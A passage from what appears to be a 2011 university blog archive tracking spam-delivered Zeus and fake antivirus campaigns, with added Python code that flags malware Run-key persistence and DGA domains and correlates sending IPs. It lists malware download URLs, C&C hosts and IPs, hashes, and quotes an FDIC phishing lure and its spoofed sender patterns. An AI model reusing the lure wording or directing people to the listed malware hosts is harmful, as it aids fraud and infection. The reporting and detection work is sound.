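# Constructed entries: the two paths the posts describe plus two benign ones.
SAMPLE_RUN_ENTRIES = {
    "3B1F8DC4": r"C:\Documents and Settings\Administrator\Application Data\3B1F8DC4\3B1F8DC4.EXE",
    "Afena": r"C:\Documents and Settings\Administrator\Application Data\Afena\iror.exe",
    "Adobe Reader Speed Launcher": r'"C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"',
    "ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe",
}

# Heuristics (assumptions for this example): where the binary lives and
# whether its directory and file names look machine-generated.
USER_WRITABLE_RE = re.compile(r"\\(?:Application Data|AppData|Local Settings\\Temp|Temp)\\", re.I)
HEX_SELF_DIR_RE = re.compile(r"\\([0-9A-F]{8})\\\1\.exe$", re.I)        # <hex>\<hex>.exe
SHORT_RANDOM_RE = re.compile(r"\\[a-z]{4,6}\\[a-z]{4,6}\.exe$", re.I)   # Afena\iror.exe


def command_path(value):
    """Extract the executable path from a Run value (quoted, or bare with args)."""
    value = value.strip()
    if value.startswith('"'):
        return value[1:value.index('"', 1)]
    m = re.match(r"(.+?\.exe)(?:\s|$)", value, re.I)
    return m.group(1) if m else value


def triage_entry(name, value):
    """Return (path, reasons) for one Run value; an empty reasons list is benign."""
    path = command_path(value)
    reasons = []
    if USER_WRITABLE_RE.search(path):
        reasons.append("user-writable-location")
    if HEX_SELF_DIR_RE.search(path):
        reasons.append("self-named-hex-dir")
    if SHORT_RANDOM_RE.search(path):
        reasons.append("short-random-names")
    return path, reasons


def triage(entries):
    """Map value name -> (path, reasons) for every entry that tripped a rule."""
    flagged = {}
    for name, value in entries.items():
        path, reasons = triage_entry(name, value)
        if reasons:
            flagged[name] = (path, reasons)
    return flagged


def read_run_keys():
    """Collect HKCU and HKLM Run values from the live registry (Windows only)."""
    if sys.platform != "win32":
        return {}
    import winreg
    entries = {}
    for root in (winreg.HKEY_CURRENT_USER, winreg.HKEY_LOCAL_MACHINE):
        try:
            with winreg.OpenKey(root, RUN_SUBKEY) as key:
                i = 0
                while True:
                    try:
                        name, value, _ = winreg.EnumValue(key, i)
                    except OSError:       # no more values
                        break
                    entries[name] = str(value)
                    i += 1
        except OSError:                   # key absent or not readable
            continue
    return entries


if __name__ == "__main__":
    for name, (path, reasons) in triage(read_run_keys() or SAMPLE_RUN_ENTRIES).items():
        print(f"{name}: {path}  <- {', '.join(reasons)}")
```

On a live host, a hit on "user-writable-location" alone is common for legitimate updaters, so treat the name-shape rules as the discriminator and hash whatever they flag for a VirusTotal lookup, as the posts did.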

It connects to domains generated by a DGA (Domain Generation Algorithm). Today's live domain was:

olojkpcltulirqr.info on 50.57.71.39

From there it did a GET for /news/?s=158404

It tried many other domains, but none of the others were live. Some of them include:

jruioljslsitjpfv.biz
wlnzkqmohuhzqyra.info
tjjhmtjlziebo.net
jpkpbxkoxwijzijr.info
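The behaviour described above (one live domain, many dead ones tried first) is what makes DGA traffic detectable at the resolver even before the live domain is known. As an added example that is not the author's code, the block below scores a domain's first label on length, vowel ratio and longest consonant run, then counts, per source host, how many generated-looking names were queried and how many came back NXDOMAIN. The thresholds are my assumptions tuned to the five domains listed in the post; the benign domains and the DNS log lines are constructed for the example.

```python
import re
from collections import defaultdict

# Domains the post lists as DGA output, plus constructed benign ones for contrast
DGA_SAMPLES = ["olojkpcltulirqr.info", "jruioljslsitjpfv.biz", "wlnzkqmohuhzqyra.info",
               "tjjhmtjlziebo.net", "jpkpbxkoxwijzijr.info"]
BENIGN_SAMPLES = ["virustotal.com", "microsoft.com", "stackoverflow.com", "irs.gov"]

# Constructed resolver log lines; the line format is an assumption
DNS_LOG = """\
src=10.0.0.5 q=jruioljslsitjpfv.biz rcode=NXDOMAIN
src=10.0.0.5 q=wlnzkqmohuhzqyra.info rcode=NXDOMAIN
src=10.0.0.5 q=tjjhmtjlziebo.net rcode=NXDOMAIN
src=10.0.0.5 q=olojkpcltulirqr.info rcode=NOERROR
src=10.0.0.7 q=microsoft.com rcode=NOERROR
src=10.0.0.7 q=stackoverflow.com rcode=NOERROR
"""

VOWELS = set("aeiou")
CONSONANT_RUN_RE = re.compile(r"[b-df-hj-np-tv-z]+")   # y counted as a consonant
LOG_RE = re.compile(r"src=(\S+) q=(\S+) rcode=(\S+)")


def features(domain):
    """Lexical features of the leftmost label only; the TLD carries no signal."""
    label = domain.split(".")[0].lower()
    vowel_ratio = sum(c in VOWELS for c in label) / len(label)
    runs = CONSONANT_RUN_RE.findall(label)
    return {
        "length": len(label),
        "vowel_ratio": vowel_ratio,
        "max_consonant_run": max((len(r) for r in runs), default=0),
    }


def looks_generated(domain, min_len=12, max_vowel_ratio=0.3, min_run=4):
    """Long label that is either vowel-poor or has an unpronounceable run."""
    f = features(domain)
    return f["length"] >= min_len and (
        f["vowel_ratio"] < max_vowel_ratio or f["max_consonant_run"] >= min_run)


def suspicious_hosts(log_text, min_hits=3):
    """Source hosts that queried several generated-looking names; the NXDOMAIN
    count shows how many of the DGA's candidates were not registered."""
    counts = defaultdict(lambda: {"generated": 0, "nxdomain": 0})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, qname, rcode = m.groups()
        if looks_generated(qname):
            counts[src]["generated"] += 1
            if rcode == "NXDOMAIN":
                counts[src]["nxdomain"] += 1
    return {src: c for src, c in counts.items() if c["generated"] >= min_hits}


if __name__ == "__main__":
    for d in DGA_SAMPLES + BENIGN_SAMPLES:
        print(f"{d:24} {features(d)}  generated={looks_generated(d)}")
    print(suspicious_hosts(DNS_LOG))
```

Lexical scoring alone will misfire on CDN and tracking hostnames, so the per-host NXDOMAIN burst is the part worth alerting on; the one name that resolved (olojkpcltulirqr.info above) is then the C&C to block.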

As we have seen before, the malware ALSO fetches a copy of "heap_v206_mails.exe" after it successfully installs itself.

The spam started at 4:45 AM (Central time), peaked at 5:15, and then began to trickle off. (We group in 15 minute windows.)

count | 15 minute spam block
-------+---------------------
3 | 2011-08-05 04:45:00
3 | 2011-08-05 05:00:00
406 | 2011-08-05 05:15:00
86 | 2011-08-05 05:30:00
(4 rows)

This morning's malware is largely undetected:

A VirusTotal Report shows 6 of 43 AV products know that this is a virus.

I have to praise Microsoft for being the only one of the six to correctly call this Zeus (Zbot).

Email subjects we've seen on this morning's campaign:

count | subject
-------+-------------------------------------------------------------------
38 | Change Confirmation
4 | Does your company is registered outstanding tax debt
5 | Does your company is registered tax debt
1 | Does your enterprise including unpaid tax debts
1 | Does your enterprise listed outstanding tax debts
1 | Does your enterprise listed unpaid tax debts
30 | Federal Tax payment rejected
1 | For your company including unpaid tax debts
1 | For your company is registered outstanding tax debts
1 | For your company is registered tax debts
1 | For your company is registered unpaid tax debt
1 | For your company listed tax debts
2 | For your enterprise listed tax debt
70 | Internal Revenue Service
24 | Internal Revenue Service (IRS)
19 | Internal Revenue Service United States Department of the Treasury
32 | IRS.gov
31 | IRS.gov US
19 | Notice of Underreported Income
35 | Payment IRS.gov
50 | Support IRS.gov
40 | Treasury Inspector General for Tax Administration
42 | U.S. Department of the Treasury
1 | Your company including outstanding tax debts
1 | Your company including tax debts
1 | Your company listed outstanding tax debt
2 | Your company listed tax debts
1 | Your enterprise including outstanding tax debts
2 | Your enterprise is registered unpaid tax debts
1 | Your enterprise listed outstanding tax debt
1 | Your enterprise listed unpaid tax debt
39 | Your IRS payment rejected
(32 rows)


A mix and match of sender name, sender-username, and sender-domain creates the from addresses:

count | sender_name
-------+---------------------------------------------------------------------
19 | "Internal Revenue Service"
18 | "Internal Revenue Service (IRS)"
27 | "Internal Revenue Service (IRS.gov)"
29 | "Internal Revenue Service United States Department of the Treasury"
23 | "Internal Revenue Service US Department of the Treasury"
29 | "IRS.gov"
18 | "IRS.gov United States Department of the Treasury"
30 | "IRS.gov US"
22 | "IRS.gov US Department of the Treasury"
21 | "IRS United States Department of the Treasury"
41 | "Payment IRS.gov"
37 | "Support IRS.gov"
23 | "The Consumer Financial Protection"
37 | "Treasury Inspector General for Tax Administration"
30 | "United States Department of the Treasury"
19 | "U.S. Department of the Treasury"
23 | "US_IRS"
17 | "USIRS"
35 | "US IRS.gov"


count | sender_username
-------+--------------------------
12 | admin
8 | adminnistration
9 | alerts
16 | cunsumer
29 | delivery
15 | e-file
10 | finance
33 | frboard-webannouncements
36 | govdelivery
26 | info
17 | information
14 | inspector
8 | internal_revenue_service
30 | Internal_Revenue_Service
18 | irs
6 | news
14 | news-alerts
8 | no-reply
28 | privacy_policy
22 | protection
5 | public
5 | report
9 | service
17 | stats
22 | subscriber
12 | subscriptions
13 | support
13 | usirc
14 | USIRS
13 | usttb
16 | webannouncements
(31 rows)

count | sender_domain
-------+-------------------
93 | antifraud.irs.gov
73 | info.irs.gov
78 | irs.gov
91 | irs.security.gov
73 | irs.taxes.gov
90 | service.irs.gov
(6 rows)

{ Comments on this entry are closed }

Love Map Spam spreads Fake AV

by UAB's Director of Research in Computer Forensics on August 3, 2011

in SBN

The top malware spam of the morning is another Fake Antivirus product, but as you'll see in today's story, it's a very familiar Fake AV product.

About 1/2 of 1% of the spam we've seen this morning is a new campaign spreading a fake antivirus dropper. The malware has a fair detection rate, with 17 of 43 AV products flagging it in the VirusTotal report for MD5 = 635aceafb9ee4236e50e7d0f6c7a7895.

The email bodies use some random misspellings, but look something like this:



WELCOME S'EXOHOLIC!
Are YOU real Se'X-tourist?
Check ->>NEW PROJECT: WORLD MAP OF PUSSY
With Best Wishes ...
www. love-map .com




and then have an attachment, which is the malware.


(the website, love-map.com, doesn't actually exist...)

The attachment filename is "map_of_love###.zip" where ### is a random number of 4 to 8 digits.

Thanks to the UAB Spam Data Mine, it's fairly easy for us to link this new Fake AV spam campaign to previous ones. For example -- we've seen 520 distinct sending IP addresses so far this morning, so let's ask "What was the most common email subject that those same sending IP addresses sent us yesterday?"

43 of the IP addresses sent us an email yesterday with the subject "Your credit card is blocked"

33 sent us "Your credit card has been blocked"

That's the same campaign we've been seeing since we wrote about it on July 23rd (see: MasterCard Spam Leads to Fake AV).

The other big fake AV campaign from yesterday was one pretending to be the US Postal Service. We saw 814 copies of that spam yesterday, and 154 of them came from computers that also sent us today's "Love Map" malware.
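The two questions the Spam Data Mine answers here, and in the IRS post above ("what other virus links had these same 190 machines sent us on other days?"), are both joins on the sending IP. Here is an added example, not the UAB tooling, that runs both against an in-memory SQLite table with the stdlib sqlite3 module. The table layout and every row are constructed assumptions shaped like the query output quoted in the posts; the two earlier-link rows reuse hosts and paths from the IRS post's table.

```python
import sqlite3

# Constructed rows shaped like the Spam Data Mine output quoted in the posts;
# the table layout and every row are assumptions made for this example.
ROWS = [
    # received_date, sending_ip, subject, url_host, url_path
    ("2011-07-13", "198.51.100.1", "Federal Tax payment rejected", "usbanking-security.com", "/tax_report.pdf.exe"),
    ("2011-07-20", "198.51.100.1", "Your IRS payment rejected", "nacha-alert.com", "/rejected_transaction.pdf.exe"),
    ("2011-08-02", "198.51.100.2", "Your credit card is blocked", None, None),
    ("2011-08-02", "198.51.100.3", "Your credit card is blocked", None, None),
    ("2011-08-02", "198.51.100.4", "USPS Attention 03867076", None, None),
    ("2011-08-02", "198.51.100.9", "Cheap watches", None, None),
    ("2011-08-03", "198.51.100.2", "HOT BABE CITIES 2011", None, None),
    ("2011-08-03", "198.51.100.3", "HOT BABY SPOTS 2011", None, None),
    ("2011-08-03", "198.51.100.4", "LOVE MAP OF GIRLS", None, None),
    ("2011-08-05", "198.51.100.1", "IRS.gov", "tax-irs-report.com", "/0000770950077US.pdf.exe"),
]


def load(rows):
    """Build the in-memory table; a real data mine would be Postgres, as the psql output suggests."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE spam (received_date TEXT, sending_ip TEXT, subject TEXT, "
               "url_host TEXT, url_path TEXT)")
    db.executemany("INSERT INTO spam VALUES (?, ?, ?, ?, ?)", rows)
    return db


def _in_clause(values):
    """Parameterised IN (...) list so IPs are never pasted into SQL text."""
    values = sorted(values)
    return "(" + ",".join("?" * len(values)) + ")", values


def campaign_senders(db, day, subject_patterns):
    """Distinct sending IPs whose subject on `day` matched any LIKE pattern."""
    where = " OR ".join("subject LIKE ?" for _ in subject_patterns)
    rows = db.execute(
        f"SELECT DISTINCT sending_ip FROM spam WHERE received_date = ? AND ({where})",
        (day, *subject_patterns))
    return {ip for (ip,) in rows}


def earlier_links_from(db, ips, before_day):
    """What other malware URLs did these same machines send us on earlier days?"""
    clause, params = _in_clause(ips)
    return db.execute(
        f"SELECT DISTINCT received_date, url_host, url_path FROM spam "
        f"WHERE sending_ip IN {clause} AND url_host IS NOT NULL AND received_date < ? "
        f"ORDER BY received_date, url_host", (*params, before_day)).fetchall()


def subjects_on_day(db, ips, day, top=5):
    """Most common subjects these same machines sent on another day."""
    clause, params = _in_clause(ips)
    return db.execute(
        f"SELECT subject, COUNT(*) AS n FROM spam WHERE sending_ip IN {clause} "
        f"AND received_date = ? GROUP BY subject ORDER BY n DESC, subject LIMIT ?",
        (*params, day, top)).fetchall()


if __name__ == "__main__":
    db = load(ROWS)
    today = campaign_senders(db, "2011-08-03", ["%BABE%", "%BABY%", "%LOVE MAP%"])
    print("today's senders:", sorted(today))
    print("what they sent yesterday:", subjects_on_day(db, today, "2011-08-02"))
    print("earlier links from the IRS senders:",
          earlier_links_from(db, {"198.51.100.1"}, "2011-08-05"))
```

The overlap count is the useful output: if a large fraction of today's senders were pushing yesterday's campaign, the two attachments are being distributed by the same botnet regardless of whether their hashes match.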

The USPS subjects were like:

DELIVERY CONFIRMATION FROM USPS 0785164
From USPS 0735590
USPS Attention 03867076
USPS: DELIVER CONFIRMATION - FAILED 1399475
USPS Delivery Confirmation 1784864
USPS id. 167163
Your USPS id. 12286791

With random upper and lowercasing, and random numbers in each subject.

Here's a VirusTotal report on yesterday's USPS Fake AV, which had MD5 = a9a01f061d336774276fabb1827b91cc

How closely related are the "MasterCard" fake AV and the USPS fake AV? Well, they are actually IDENTICAL. It's the same malware. Here's a report extract from yesterday showing the email subject and the MD5 of the attached malware:

Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card has been blocked | a9a01f061d336774276fabb1827b91cc
Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card has been blocked | a9a01f061d336774276fabb1827b91cc
Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card has been blocked | a9a01f061d336774276fabb1827b91cc
Your credit card has been blocked | a9a01f061d336774276fabb1827b91cc
Your credit card has been blocked | a9a01f061d336774276fabb1827b91cc
Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card is blocked | a9a01f061d336774276fabb1827b91cc
Your credit card has been blocked | a9a01f061d336774276fabb1827b91cc
From USPS 38864359 | a9a01f061d336774276fabb1827b91cc
USPS DELIVERY CONFIRMATION 954859 | a9a01f061d336774276fabb1827b91cc
From USPS 8815572 | a9a01f061d336774276fabb1827b91cc
DELIVERY CONFIRMATION FROM USPS 6498394 | a9a01f061d336774276fabb1827b91cc
DELIVERY CONFIRMATION FROM USPS 73687208 | a9a01f061d336774276fabb1827b91cc
USPS DELIVERY CONFIRMATION 56547166 | a9a01f061d336774276fabb1827b91cc
USPS ATTENTION 578975 | a9a01f061d336774276fabb1827b91cc
USPS: DELIVER CONFIRMATION - FAILED 9211453 | a9a01f061d336774276fabb1827b91cc
From USPS 5174072 | a9a01f061d336774276fabb1827b91cc
USPS Attention 1201554 | a9a01f061d336774276fabb1827b91cc
Your USPS id. 92444941 | a9a01f061d336774276fabb1827b91cc
DELIVERY CONFIRMATION FROM USPS 575555 | a9a01f061d336774276fabb1827b91cc
Your USPS id. 82259351 | a9a01f061d336774276fabb1827b91cc
Your USPS id. 139017 | a9a01f061d336774276fabb1827b91cc
Your USPS id. 381458 | a9a01f061d336774276fabb1827b91cc
From USPS 3877947 | a9a01f061d336774276fabb1827b91cc
USPS id. 45254864 | a9a01f061d336774276fabb1827b91cc

OK, back to today . . .

Here are the "Love Map" spam subject lines we've seen it use so far:


BABECITIES IN WORLD 2011
BABEPLACES IN WORLD 2011
BABIESPLACES IN WORLD 2011
BABIESSPOTS IN WORLD 2011
BABYCITIES IN WORLD 2011
BABYSPOTS IN WORLD 2011
GIRLSCITIES IN WORLD 2011
GIRLSPLACES IN WORLD 2011
GIRLSSPOTS IN WORLD 2011
HOT BABE CITIES 2011
HOT BABE PLACES 2011
HOT BABE SPOTS 2011
HOT BABIES CITIES 2011
HOT BABIES SPOTS 2011
HOT BABY CITIES 2011
HOT BABY PLACES 2011
HOT BABY SPOTS 2011
HOT CITIES OF BABE 2011
HOTCITIES OF BABIES 2011
HOT CITIES OF BABY 2011
HOTCITIES OF BABY 2011
HOT CITIES OF GIRLS 2011
HOTCITIES OF GIRLS 2011
HOTCITIES OF PUSSY 2011
HOT GIRLS PLACES 2011
HOT GIRLS SPOTS 2011
HOT PLACES OF BABE 2011
HOT PLACES OF BABIES 2011
HOTPLACES OF BABIES 2011
HOT PLACES OF BABY 2011
HOTPLACES OF BABY 2011
HOT PLACES OF GIRLS 2011
HOTPLACES OF GIRLS 2011
HOT PLACES OF GIRLS IN WORLD
HOTPLACES OF GIRLS IN WORLD
HOT PLACES OF PUSSIES 2011
HOTPLACES OF PUSSIES 2011
HOT PLACES OF PUSSY 2011
HOTPLACES OF PUSSY 2011
HOT PUSSIES CITIES 2011
HOT PUSSIES SPOTS 2011
HOT PUSSY CITIES 2011
HOT PUSSY PLACES 2011
HOT PUSSY SPOTS 2011
HOT SPOTS OF BABE 2011
HOT SPOTS OF BABIES 2011
HOTSPOTS OF BABIES 2011
HOT SPOTS OF GIRLS 2011
HOTSPOTS OF GIRLS 2011
HOT SPOTS OF GIRLS IN WORLD
HOT SPOTS OF PUSSIES 2011
HOTSPOTS OF PUSSIES 2011
HOT SPOTS OF PUSSY 2011
HOTSPOTS OF PUSSY 2011
JULY-2011: BABECITIES IN WORLD
JULY-2011: BABEPLACES IN WORLD
JULY-2011: BABIESCITIES IN WORLD
JULY-2011: BABIESPLACES IN WORLD
JULY-2011: BABYCITIES IN WORLD
JULY-2011: BABYPLACES IN WORLD
JULY-2011: GIRLSPLACES IN WORLD
JULY-2011: GIRLSSPOTS IN WORLD
JULY-2011: HOT BABE CITIES
JULY-2011: HOT BABE PLACES
JULY-2011: HOT BABE SPOTS
JULY-2011: HOT BABIES CITIES
JULY-2011: HOT BABY CITIES
JULY-2011: HOT BABY PLACES
JULY-2011: HOT BABY SPOTS
JULY-2011: HOT CITIES OF BABE
JULY-2011: HOTCITIES OF BABE
JULY-2011: HOTCITIES OF BABIES
JULY-2011: HOT CITIES OF BABY
JULY-2011: HOTCITIES OF BABY
JULY-2011: HOT CITIES OF GIRLS
JULY-2011: HOTCITIES OF GIRLS
JULY-2011: HOT CITIES OF PUSSIES
JULY-2011: HOTCITIES OF PUSSIES
JULY-2011: HOT CITIES OF PUSSY
JULY-2011: HOTCITIES OF PUSSY
JULY-2011: HOT GIRLS PLACES
JULY-2011: HOT GIRLS SPOTS
JULY-2011: HOT PLACES OF BABE
JULY-2011: HOTPLACES OF BABE
JULY-2011: HOT PLACES OF BABIES
JULY-2011: HOTPLACES OF BABIES
JULY-2011: HOT PLACES OF BABY
JULY-2011: HOTPLACES OF BABY
JULY-2011: HOT PLACES OF GIRLS
JULY-2011: HOTPLACES OF GIRLS
JULY-2011: HOTPLACES OF PUSSIES
JULY-2011: HOT PLACES OF PUSSY
JULY-2011: HOTPLACES OF PUSSY
JULY-2011: HOT PUSSIES CITIES
JULY-2011: HOT PUSSIES PLACES
JULY-2011: HOT PUSSIES SPOTS
JULY-2011: HOT PUSSY CITIES
JULY-2011: HOT PUSSY PLACES
JULY-2011: HOT PUSSY SPOTS
JULY-2011: HOTSPOTS OF BABE
JULY-2011: HOT SPOTS OF BABIES
JULY-2011: HOTSPOTS OF BABIES
JULY-2011: HOT SPOTS OF BABY
JULY-2011: HOTSPOTS OF BABY
JULY-2011: HOT SPOTS OF GIRLS
JULY-2011: HOTSPOTS OF GIRLS
JULY-2011: HOT SPOTS OF PUSSIES
JULY-2011: HOTSPOTS OF PUSSIES
JULY-2011: HOT SPOTS OF PUSSY
JULY-2011: LOVE BABE CITIES
JULY-2011: LOVE BABE PLACES
JULY-2011: LOVE BABIES SPOTS
JULY-2011: LOVE BABY CITIES
JULY-2011: LOVE BABY PLACES
JULY-2011: LOVE BABY SPOTS
JULY-2011: LOVE CITIES IN WORLD
JULY-2011: LOVE CITIES OF BABE
JULY-2011: LOVECITIES OF BABE
JULY-2011: LOVECITIES OF BABIES
JULY-2011: LOVE CITIES OF BABY
JULY-2011: LOVECITIES OF BABY
JULY-2011: LOVECITIES OF GIRLS
JULY-2011: LOVE CITIES OF PUSSIES
JULY-2011: LOVECITIES OF PUSSIES
JULY-2011: LOVE CITIES OF PUSSY
JULY-2011: LOVECITIES OF PUSSY
JULY-2011: LOVE GIRLS CITIES
JULY-2011: LOVE GIRLS PLACES
JULY-2011: LOVE GIRLS SPOTS
JULY-2011: LOVE MAP OF BABE
JULY-2011: LOVE MAP OF BABIES
JULY-2011: LOVE-MAP OF BABIES
JULY-2011: LOVE-MAP OF BABY
JULY-2011: LOVE MAP OF GIRLS
JULY-2011: LOVE-MAP OF GIRLS
JULY-2011: LOVE MAP OF PUSSIES
JULY-2011: LOVE-MAP OF PUSSIES
JULY-2011: LOVE MAP OF PUSSY
JULY-2011: LOVE-MAP OF PUSSY
JULY-2011: LOVEPLACES IN WORLD
JULY-2011: LOVE PLACES OF BABE
JULY-2011: LOVEPLACES OF BABE
JULY-2011: LOVE PLACES OF BABIES
(532 rows)


"Wrong Transaction" Hotel spam malware continues to evolve

by UAB's Director of Research in Computer Forensics on July 31, 2011

in SBN

One of the distinct advantages of having the UAB Spam Data Mine is that we are able to provide near-real-time intelligence about the evolution of malware campaigns being delivered by spam. On July 27, 2011 we provided a warning about Wrong Transaction Hotel Spam that was covered by Robert McMillan in PC World and ComputerWorld, and was also mentioned by Matt Liebowitz for MSNBC.

Unfortunately, from an anti-virus perspective, consumers are no safer than they were when we first put out the warning four days ago.

We're still seeing more than 1,000 copies of this malware each day (with the exception of the 29th):

 count | receiving_date
-------+----------------
  1516 | 2011-07-27
  1828 | 2011-07-28
   813 | 2011-07-29
  1470 | 2011-07-30
  1258 | 2011-07-31
(5 rows)


but the malware is constantly evolving.

Count | Malware MD5                      | Time Range
  593 | c15eb3c47800fec025b6a86a6409f144 | 2011-07-27 03:00 AM to 2011-07-27 08:30 AM
 1001 | 01e3bbd4b6f8c22a3516771f9b6792bc | 2011-07-27 12:45 PM to 2011-07-28 04:45 AM
  318 | 57d931256fd6d7184528ae983e34677b | 2011-07-27 08:00 AM to 2011-07-27 13:30 PM
  865 | 6e2eae488317280dd813e3e2fc9e0275 | 2011-07-28 04:15 AM to 2011-07-28 13:00 PM
  554 | ad760ac5806a84a272e1eb76b315ac31 | 2011-07-28 12:30 PM to 2011-07-28 20:15 PM
 1116 | 4140ee10115174fe36a738d4d943f2af | 2011-07-29 13:45 PM to 2011-07-30 04:00 AM
  614 | e2d3d4ccf02ea924e6d11cb452235f4c | 2011-07-30 03:30 AM to 2011-07-30 16:15 PM
  931 | 5bbe80ad216c89bcbb6891178dc4b5fa | 2011-07-30 14:45 PM to 2011-07-31 07:30 AM
  409 | ca84d1a0c49eff5ca829b5fa531800e8 | 2011-07-31 07:30 AM to 2011-07-31 13:15 PM
  484 | aa412182a164321a159f9b2e95be53bc | 2011-07-31 13:15 PM to 2011-07-31 CURRENT TIME


Each of the links in the table above will take you to the VirusTotal report showing how many of 43 different anti-virus products detected this particular malware at the time it was submitted to VirusTotal.

I'll let you explore the links for yourself, but may I call attention to the fact that the last one is detected by FOUR of forty-three AV products, and the one immediately prior to that by ONE of forty-three.

Just to make sure there was not a problem, I decided to look at those last two and confirm that they actually were malware.

We started with the sample whose MD5 begins with "aa412". It unpacks successfully as an .exe named "Refund_Form" that uses an icon from Microsoft Office Excel to try to trick people into thinking it's a spreadsheet.

When we launched it, it made connections to:

runescapegpge2011.ru - 84.247.61.25
www.radio-80.com - 210.172.192.38
heftyhips.com - 66.197.251.53

That last would be exactly the same domain that the first sample we looked at on the 27th connected to. It fetched "soft.exe" from www.radio-80.com.

I'm going to go out on a limb and say this is malware. "soft.exe" got renamed "defender.exe" and placed in our "C:\Documents and Settings\All Users\Application Data\" directory, which was scheduled to launch when the machine reboots.

Defender.exe was declared to be malware by 6 of 43 anti-virus packages at VirusTotal. Here's the report. It's Fake anti-virus.

Next, just to be thorough, we also checked out the version that started with "ca84d1". Just like the first, it unpacked to a "Refund_Form.exe" file, although this one had a different MD5. When we launched Refund_Form it made network connections to:

runescapegpge2011.ru - 84.247.61.25
ewingparkbmx2011.ru - failed to resolve

It looks like this version is not functioning due to a dead domain, which may be the reason the "aa412" version was released.

That "84.247.61.25" box is in Romania, currently using a domain name containing "RuneScape". The same IP has recently been called bedownloader2011.ru, diamondexchange2011.ru, watchfamilyguynow2011.ru and is also currently resolving as yomwarayom2001.ru.

Update 01AUG2011

At 3:15 this morning, the malware being distributed swapped to:

2e749d608d29aef739f5b08e7f63225a (click for VirusTotal Report)

The MD5 for the exe inside of the zip file with MD5 2e749d608d29aef739f5b08e7f63225a is:

a446ced5db1de877cf78f77741e2a804 Filename: Refund-Form (dot) exe (1 of 43 detects at VirusTotal).


At 4:30 this morning, and continuing to the present moment (07:45 AM Central Time), the malware being distributed swapped to:

4b126c49c261ca0f65fce9e5d08811d6 (click for VirusTotal Report)

The MD5 for the exe inside of the zip file with MD5 4b126c49c261ca0f65fce9e5d08811d6 is:

2f0155c39ddcf490f3a310ba0546c627 Filename: Refund_Form (dot) exe (5 of 43 detects at VirusTotal).


"Government-related" Zeus spam continues

by UAB's Director of Research in Computer Forensics on July 28, 2011

in SBN

As we discussed in yesterday's article, "Wrong transaction" hotel spam, the UAB Spam Data Mine now has the ability to provide early alerting when a new spam campaign is directly linking to executable files.

This morning we have a new example of this capability in the form of the two most recent installments of a long-running "government-related" Zeus campaign.

One of the two spammed destinations is:

alert-irs.com /00000700973770US.exe MD5 = 0691a4856713edc97664e60db735747c

This malware is currently showing a (12 of 43) detection rate at VirusTotal, as seen in this VirusTotal Report.

The other spammed destination is:

fdic-updates.com /system_update_07_28.exe MD5 = 7a0303fdb809ac0c1a84123b106992c2

This malware is currently showing a (8 of 43) detection rate at VirusTotal, as seen in this VirusTotal Report.

Both files are 172,032 bytes in size, but currently the FDIC one is showing a dramatically wider distribution via email than the IRS one, which may be an indication of "targeting" by the latter.

The FDIC version has been seen almost 500 times, despite the fact that the campaign is less than 45 minutes old as of this writing. Here is the count per 15 minute block seen in the UAB Spam Data Mine:

  5 | ACH and Wire transfers disabled.      | 2011-07-28 06:00:00
  3 | Banking security update.              | 2011-07-28 06:00:00
  1 | Update for your banking account.      | 2011-07-28 06:00:00
107 | ACH and Wire transfers disabled.      | 2011-07-28 05:45:00
138 | Banking security update.              | 2011-07-28 05:45:00
108 | Security update for banking accounts. | 2011-07-28 05:45:00
122 | Update for your banking account.      | 2011-07-28 05:45:00
  1 | Banking security update.              | 2011-07-28 05:30:00
  1 | Security update for banking accounts. | 2011-07-28 05:30:00
  1 | ACH and Wire transfers disabled.      | 2011-07-28 05:15:00
  1 | Banking security update.              | 2011-07-28 05:15:00
  1 | Security update for banking accounts. | 2011-07-28 05:15:00


(Timestamps are US-Central Time, GMT -6)


The FDIC spam comes from email addresses that randomly associate these "usernames" with these "hostnames". Everything in the first column was seen combined with everything in the second column.

Usernames:
admin
adminnistration
cunsumer
FDIC
finance
govdelivery
information
inspector
news
no-reply
privacy_policy
protection
public
report
service
stats
support
webannouncements

Hostnames:
admin.fdic.gov
administration.fdic.gov
fdic.gov
security.fdic.gov


Here's what the email actually says:

Dear clients,
Your account ACH and Wire transactions have been
temporarily suspended for your settings, due to the
expiration of your security version. To download and install the
newest Updates, click here.

As soon as it is Applied, your transaction abilities will be fully restored.

Best regards,
Online security department
Federal Deposit Insurance Corporation



The IRS related spam came first:

2 | Internal Revenue Service     | 2011-07-28 04:15:00
2 | Federal Tax payment rejected | 2011-07-28 04:00:00
2 | Your IRS payment rejected    | 2011-07-28 04:00:00
2 | Internal Revenue Service     | 2011-07-28 03:45:00


This is fairly typical spamming for this group. They like to make a new Zeus variant, place it on a website, and then spam it very hard at the beginning of the East Coast business day. For example, here is the spam for:

"nacha-rejected.com"

 2 | Rejected transaction | 2011-07-27 05:30:00
 1 | Canceled payment     | 2011-07-27 05:15:00
 2 | Canceled transaction | 2011-07-27 05:15:00
 3 | Payment rejected     | 2011-07-27 05:15:00
 5 | Rejected transaction | 2011-07-27 05:15:00
 2 | Canceled transaction | 2011-07-27 05:00:00
 8 | Canceled transfer    | 2011-07-27 05:00:00
 5 | Payment canceled     | 2011-07-27 05:00:00
 3 | Payment rejected     | 2011-07-27 05:00:00
 4 | Rejected transaction | 2011-07-27 05:00:00
92 | Canceled payment     | 2011-07-27 04:45:00
74 | Canceled transaction | 2011-07-27 04:45:00
84 | Canceled transfer    | 2011-07-27 04:45:00
60 | Payment canceled     | 2011-07-27 04:45:00
75 | Payment rejected     | 2011-07-27 04:45:00
57 | Rejected transaction | 2011-07-27 04:45:00
 2 | Payment canceled     | 2011-07-27 04:30:00
 1 | Payment rejected     | 2011-07-27 04:30:00
 1 | Canceled transaction | 2011-07-27 04:15:00
 2 | Payment canceled     | 2011-07-27 04:15:00


nacha-transactions.com

